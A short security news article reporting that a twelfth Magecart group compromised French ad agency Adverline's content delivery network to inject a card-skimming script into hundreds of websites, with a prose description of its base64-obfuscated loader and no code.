New Magecart Group Hits Hundreds of Sites Via Supply Chain

Researchers have uncovered a twelvth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain. RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party. This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code. This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors. “Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.